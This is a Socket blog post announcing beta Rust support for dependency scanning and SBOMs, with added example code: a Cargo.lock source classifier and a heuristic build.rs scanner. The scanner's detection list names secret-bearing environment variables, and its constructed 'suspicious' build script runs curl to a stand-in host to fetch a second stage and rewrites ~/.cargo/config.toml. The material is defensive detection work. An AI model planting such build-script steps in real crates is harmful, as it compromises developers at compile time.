Rust Support Now in Beta

Socket's Rust support is moving to Beta: all users can scan Cargo projects and generate SBOMs, including Cargo.toml-only crates, with Rust-aware supply chain checks.

Mikola Lysenko

Trevor Norris

September 11, 2025

We are promoting Rust support from Experimental to Beta. Over the past several months we validated the feature with enterprise customers across complex Cargo workspaces.

As of today, all users can analyze Rust projects in Socket, including full dependency analysis and SBOM generation for crates published to crates.io. Rust support has been tested against real customer codebases and refined based on that feedback, and it is ready for broader beta use.

Current Scope in Beta

In August, we added support for SBOM generation from Cargo.toml-only crates. You can run supply chain checks even when a lockfile is missing. We have also expanded Rust-aware detections and improved stability on large dependency graphs.

Rust scanning supports single crates and full Cargo workspaces, including feature flags and workspace inheritance. You can scan with Cargo.toml only, or add Cargo.lock for pinned, fully reproducible builds. Git or local path dependencies are not supported yet and will appear as unresolved.

If Your JavaScript Stack Uses Rust

Many JavaScript teams now use Rust-powered tools like SWC, Turbopack, Rspack, Lightning CSS, Biome, and Oxc. If you build or vendor these tools from source, or ship Rust-native add-ons, Socket’s Rust support scans those Cargo projects directly and produces a Rust SBOM alongside supply chain checks. If you only install the tools via npm binaries, Socket’s npm analysis remains your primary line of defense because the Rust crates are not part of your project’s source or build.

Guidance on Lockfiles

Cargo.toml-only scanning works, but a lockfile is still recommended for the most deterministic results. Feature resolution, target platforms, and workspace settings can change which dependencies are selected, and Cargo.lock captures the exact versions you build, together with a checksum for each registry crate and the exact commit for each git dependency. Commit Cargo.lock for binaries and scan with it wherever you have one.
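As an added example (not Socket's code, and not how Socket resolves a lockfile), the following Rust program reads the `[[package]]` tables of a Cargo.lock with a small hand-written parser, classifies each entry as a registry, git, or path source, emits a package URL for the registry crates (the identifier form an SPDX or CycloneDX SBOM would carry), and lists the entries that a registry-only scan would report as unresolved, which is how the page says git and path dependencies currently appear. The lockfile text is constructed for the example; the crate names, URLs and checksum are made up.

```rust
// Added example, not Socket's code: classify the dependency sources pinned in a Cargo.lock.
// A hand-rolled line parser is used instead of the toml crate so the block runs stand-alone;
// it is sufficient for the keys Cargo writes into [[package]] tables.

#[derive(Debug, Clone, PartialEq)]
pub enum Source {
    /// Published registry crate (crates.io or a private index), pinned by checksum.
    Registry { index: String, checksum: Option<String> },
    /// Git dependency: pinned to a commit, but not a published crate.
    Git { url: String, rev: Option<String> },
    /// Path dependency or a workspace member: Cargo writes no `source` key for these.
    Path,
    /// Anything else (unknown source scheme).
    Other(String),
}

#[derive(Debug, Clone, PartialEq)]
pub struct LockedPackage {
    pub name: String,
    pub version: String,
    pub source: Source,
}

#[derive(Default)]
struct Entry {
    name: Option<String>,
    version: Option<String>,
    source: Option<String>,
    checksum: Option<String>,
}

/// Strip surrounding quotes from a TOML basic string value.
fn unquote(v: &str) -> String {
    v.trim().trim_matches('"').to_string()
}

/// Map Cargo's `source` string (or its absence) onto a Source variant.
fn classify(source: Option<String>, checksum: Option<String>) -> Source {
    let s = match source {
        None => return Source::Path,
        Some(s) => s,
    };
    if let Some(index) = s.strip_prefix("registry+").or_else(|| s.strip_prefix("sparse+")) {
        return Source::Registry { index: index.to_string(), checksum };
    }
    if let Some(rest) = s.strip_prefix("git+") {
        // Cargo writes `git+<url>[?branch=...]#<commit>`; the fragment is the pinned commit.
        let (url, rev) = match rest.split_once('#') {
            Some((u, r)) => (u.to_string(), Some(r.to_string())),
            None => (rest.to_string(), None),
        };
        return Source::Git { url, rev };
    }
    Source::Other(s)
}

fn push(out: &mut Vec<LockedPackage>, e: Entry) {
    if let (Some(name), Some(version)) = (e.name, e.version) {
        out.push(LockedPackage { name, version, source: classify(e.source, e.checksum) });
    }
}

/// Parse every `[[package]]` table from Cargo.lock text.
pub fn parse_cargo_lock(text: &str) -> Vec<LockedPackage> {
    let mut out = Vec::new();
    let mut entry: Option<Entry> = None;
    for raw in text.lines() {
        let line = raw.trim();
        if line == "[[package]]" {
            if let Some(e) = entry.take() { push(&mut out, e); }
            entry = Some(Entry::default());
            continue;
        }
        if line.starts_with('[') {
            // Some other table (e.g. [metadata]) closes the current package.
            if let Some(e) = entry.take() { push(&mut out, e); }
            continue;
        }
        let e = match entry.as_mut() { Some(e) => e, None => continue };
        if let Some((k, v)) = line.split_once('=') {
            match k.trim() {
                "name" => e.name = Some(unquote(v)),
                "version" => e.version = Some(unquote(v)),
                "source" => e.source = Some(unquote(v)),
                "checksum" => e.checksum = Some(unquote(v)),
                _ => {} // `dependencies = [` and array items carry no key we need
            }
        }
    }
    if let Some(e) = entry.take() { push(&mut out, e); }
    out
}

/// Package URL for a registry crate; git and path entries have no published identity.
pub fn purl(p: &LockedPackage) -> Option<String> {
    match p.source {
        Source::Registry { .. } => Some(format!("pkg:cargo/{}@{}", p.name, p.version)),
        _ => None,
    }
}

/// Entries a registry-only analysis cannot resolve (git, path, unknown).
pub fn unresolved(pkgs: &[LockedPackage]) -> Vec<&LockedPackage> {
    pkgs.iter().filter(|p| !matches!(p.source, Source::Registry { .. })).collect()
}

/// Constructed sample lockfile: one registry crate, one git crate, one path crate, plus the root.
pub const SAMPLE_LOCK: &str = r#"# This file is automatically @generated by Cargo.
version = 3

[[package]]
name = "myapp"
version = "0.1.0"
dependencies = [
 "fastcheck",
 "localutil",
 "serde",
]

[[package]]
name = "serde"
version = "1.0.210"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "c8e3592472072e6e22e0a54d5f2c6e4f3e1e5f3e3d4c2c1f0c7e3c2e1d0b9a8f"

[[package]]
name = "fastcheck"
version = "0.3.0"
source = "git+https://github.com/example/fastcheck?branch=main#0123456789abcdef0123456789abcdef01234567"

[[package]]
name = "localutil"
version = "0.1.0"
"#;

fn main() {
    let pkgs = parse_cargo_lock(SAMPLE_LOCK);
    for p in &pkgs {
        match purl(p) {
            Some(u) => println!("resolved   {u}"),
            None => println!("unresolved {} {} ({:?})", p.name, p.version, p.source),
        }
    }
    println!("{} of {} entries would be unresolved", unresolved(&pkgs).len(), pkgs.len());
}
```

Note that the root crate `myapp` also has no `source` key, so from the lockfile alone a workspace member is indistinguishable from a path dependency; telling them apart needs the `[workspace]` members from Cargo.toml, which is one reason a scan wants both files.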

What Socket Analyzes in Rust Packages

If you’re new to Socket, the platform analyzes open source dependencies for supply chain risk. For Rust projects, it reads your Cargo metadata, maps the full dependency graph, generates an SBOM, and flags behaviors that traditional SCA tools miss. With this Beta you can now scan Rust repos and review findings in the app, including the following:

  • Malicious or risky build scripts that execute during compilation
  • Suspicious unsafe usage patterns
  • FFI boundary risks where Rust interfaces with other languages
  • Hidden telemetry, protestware, and other unexpected behaviors

Socket also detects licenses across your Rust dependencies, surfaces license alerts, and enforces your org’s allow/deny lists. You can export results as SPDX or CycloneDX SBOMs, which include detected license data where available.
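To make the first item in that list concrete, here is an added example (not Socket's detector, whose rules this page does not describe) of a heuristic scanner for Cargo build scripts. It walks a build.rs line by line and reports process execution, network access, reads of sensitive environment variables, and filesystem writes that do not target OUT_DIR, with a severity per rule. Both build scripts it scans are constructed for the example: the suspicious one exercises each rule and the benign one shows the OUT_DIR exemption. The rule list, needles and severities are illustrative assumptions.

```rust
// Added example, not Socket's code: a line-oriented heuristic scanner for build.rs.
// Rules, severities and the two sample scripts are illustrative assumptions.

#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum Severity {
    Medium,
    High,
}

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Finding {
    pub line: usize,
    pub severity: Severity,
    pub rule: &'static str,
    pub excerpt: String,
}

struct Rule {
    name: &'static str,
    severity: Severity,
    /// Substrings that fire the rule when they appear on a source line.
    needles: &'static [&'static str],
    /// If the lower-cased line contains this, the hit is treated as expected and skipped.
    exempt_if: Option<&'static str>,
}

const RULES: &[Rule] = &[
    Rule {
        name: "process execution at build time",
        severity: Severity::High,
        needles: &["Command::new(", ".spawn("],
        exempt_if: None,
    },
    Rule {
        name: "network access at build time",
        severity: Severity::High,
        needles: &["std::net", "TcpStream::connect", "reqwest", "ureq", "http://", "https://"],
        exempt_if: None,
    },
    Rule {
        name: "reads sensitive environment",
        severity: Severity::Medium,
        needles: &["\"HOME\"", "CARGO_HOME", "SSH_AUTH_SOCK", "TOKEN", "SECRET", "AWS_"],
        exempt_if: None,
    },
    Rule {
        name: "filesystem write outside OUT_DIR",
        severity: Severity::Medium,
        // Writing generated sources into OUT_DIR is the normal, expected use.
        needles: &["fs::write", "File::create", "OpenOptions"],
        exempt_if: Some("out_dir"),
    },
];

/// Scan build.rs source text and return one finding per (line, rule) hit.
pub fn scan_build_script(src: &str) -> Vec<Finding> {
    let mut findings = Vec::new();
    for (idx, raw) in src.lines().enumerate() {
        let line = raw.trim();
        if line.starts_with("//") {
            continue; // a commented-out call should not fire
        }
        let lower = line.to_ascii_lowercase();
        for rule in RULES {
            if !rule.needles.iter().any(|n| line.contains(n)) {
                continue;
            }
            if rule.exempt_if.map_or(false, |ex| lower.contains(ex)) {
                continue;
            }
            findings.push(Finding {
                line: idx + 1,
                severity: rule.severity,
                rule: rule.name,
                excerpt: line.to_string(),
            });
        }
    }
    findings
}

/// Highest severity among the findings, if any.
pub fn max_severity(findings: &[Finding]) -> Option<Severity> {
    findings.iter().map(|f| f.severity).max()
}

/// Constructed benign build script: compiles a C file and writes generated code into OUT_DIR.
pub const BENIGN_BUILD_RS: &str = r#"fn main() {
    println!("cargo:rerun-if-changed=src/native.c");
    let out_dir = std::env::var("OUT_DIR").unwrap();
    std::fs::write(format!("{}/generated.rs", out_dir), "pub const X: u32 = 1;").unwrap();
    cc::Build::new().file("src/native.c").compile("native");
}
"#;

/// Constructed suspicious build script: reads HOME, fetches over the network, writes into ~/.cargo.
pub const SUSPICIOUS_BUILD_RS: &str = r#"use std::env;
use std::process::Command;

fn main() {
    println!("cargo:rerun-if-changed=build.rs");
    let home = env::var("HOME").unwrap_or_default();
    let _ = Command::new("curl").arg("-s").arg("https://example.invalid/stage2").output();
    std::fs::write(format!("{}/.cargo/config.toml", home), "[net]\n").ok();
}
"#;

fn main() {
    for (label, src) in [("benign", BENIGN_BUILD_RS), ("suspicious", SUSPICIOUS_BUILD_RS)] {
        let findings = scan_build_script(src);
        println!("{label}: {} finding(s), max severity {:?}", findings.len(), max_severity(&findings));
        for f in &findings {
            println!("  line {} [{:?}] {}: {}", f.line, f.severity, f.rule, f.excerpt);
        }
    }
}
```

Substring rules like these are easy to evade (a crate can build the command name at runtime or hide it in a dependency of the build script), which is why the scanner is a triage aid rather than a verdict; anything it flags still needs a human to read the build script and the crate that ships it.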

How to Get Started

  1. Add or select a Rust repository in Socket.
  2. Ensure Cargo.toml is present. Include Cargo.lock if you want pinned analysis.
  3. Run a scan to generate an SBOM and review supply chain findings.
  4. Set policies that match your team’s tolerance and triage results.

We’re continuing to refine Rust-specific detectors and improve performance and stability as we move toward general availability.

Try it now with your Rust apps and let us know what would help you most as we finalize GA.
